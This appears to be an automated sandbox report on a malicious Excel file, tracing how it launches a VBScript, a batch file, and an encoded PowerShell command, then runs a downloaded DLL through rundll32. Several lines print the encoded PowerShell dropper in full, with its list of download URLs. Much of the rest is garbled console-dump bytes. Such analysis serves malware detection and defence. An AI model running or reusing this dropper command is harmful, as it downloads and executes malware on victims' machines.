Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................<E.91..................P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w.....................................M........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .h.j.h.d.r.d.r.e.s.a.s.=.p.o. ..........=E.91..S.E.T...........P>..............h.0..... .......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................<E.91..h...............P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w.....................................M......................8.0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................=E.91..e.c.h.o.........P>......................h.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>......................g=E.91..................P>..............8.0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w.....................................M........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .Y.U.d.e.r.h.d.D.3.=.w.e.r.s. ..........=E.91..S.E.T...........P>................0..... .......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................=E.91..h...............P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w.....................................M......................x.0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................w:E.91..e.c.h.o.........P>......................j.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>......................':E.91..................P>..............x.0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w.....................................N........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .V.v.d.s.F.H.d.4.=.h.e.l.l. .-.e. ......:E.91..S.E.T...........P>................0.....$.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>......................G:E.91..h...............P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w.....................................N........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................7;E.91..e.c.h.o.........P>......................p.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................:E.91..................P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................................0N......................X.0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................W;E.91..S.E.T...........P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................;E.91..................P>..............X.0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................................BN........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................;E.91..e.c.h.o.........P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................;E.91..................P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................................TN........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................8E.91..S.E.T...........P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................;E.91..................P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w....................................fN......................8.0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................8E.91..e.c.h.o.........P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>......................g8E.91..................P>..............8.0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........}..w....................................xN........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................8E.91..S.E.T...........P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................8E.91..................P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..w.....................................N......................x.0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................w9E.91..e.c.h.o.........P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>......................'9E.91..................P>..............x.0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................S.E.T...........P>......................'9E.91..................P>..............x.0.............h...............
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................w9E.91..S.E.T...........P>......................>.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................X..J....................7<E.91..:i.J............P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .V.o.l.u.m.e. .i.n. .d.r.i.v.e. .C. .h.a.s. .n.o. .l.a.b.e.l...........%.........0.....D.......B.........0.....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .V.o.l.u.m.e. .S.e.r.i.a.l. .N.u.m.b.e.r. .i.s. .2.0.A.2.-.D.C.6.8.....).........0.....H.......B.........0.....
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................C......0.0..............12w.... .0.......0.......................0.....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .D.i.r.e.c.t.o.r.y. .o.f. .c.:.\.................................................0.....*.......B...............
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................^.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................................................................................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................h.......h...............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................................................................................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................t.......h...............
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................X.......h...............
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................................................................\.......h...............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................d1................................0..............f/w....C...............^.......B...............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................d1......................................................O...............j.......B...............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w.....................6E.91...........`.J....P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w....................w4E.91...........`.J....P>......................h.......`...............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w.....................5E.91...........`.J....P>......................j.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w....................w3E.91...........`.J....P>......................p.......p...............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w.....................0E.91...........`.J....P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................>.1w....................w.E.91..`........`.J....P>...............................!..............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w......................E.91...........`.J....P>...............................$..............
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................p........................:E.91....................................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............0.....2..................J....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o..........%.J..................../.......................n_.J............X.0.............X%.J............
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................W<E.91..e.c.h.o.........P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&. ...........P>.......................<E.91..................P>..............X.0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................s.t.a.r.t./.B...}..w....................................{O........................0............. .&. ...........
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................<E.91..s.t.a.r.........P>......................`.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........P>.......................<E.91..................P>................0.............h...............
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................<E.91..e.c.h.o.........P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: .................................................1.w....................7<E.91..................P>................0.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................>.1w....................76E.91..`........`.J....P>..............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ..................................................1w.....................6E.91...........`.J....P>..............................@ ..............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................6.......6.....}..w.............................1......(.P..............3...................... ...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................)..l....}..w.... .......\.......................(.P.....................X...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9........l......b.....(.P.............................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................)..l....}..w.... .......\.......................(.P.....................X...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l......b.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l......b.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l......b.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l......b.....(.P.............................b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.............L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .......}..w............@=b........l......b.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9........l....(.a.....(.P.............................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.............................b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.............L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9........l....(.a.....(.P.............................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.............................b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................c.h.a.n.n.e.l...}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9........l....(.a.....(.P.............................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.............................b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.............L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................o.c.c.u.r.r.e.d. .o.n. .a. .s.e.n.d........l....(.a.....(.P.............................&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.2.9........l....(.a.....(.P.............................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.............................b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w............@=b........l....(.a.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.............L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .......}..w............@=b........l....(.a.....(.P.....................................................

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd

Source: xxTupY4Fr3.xlsx

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wscript.exe wscript c:\programdata\wetidjks.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wscript.exe wscript c:\programdata\wetidjks.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wscript.exe wscript c:\programdata\wetidjks.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
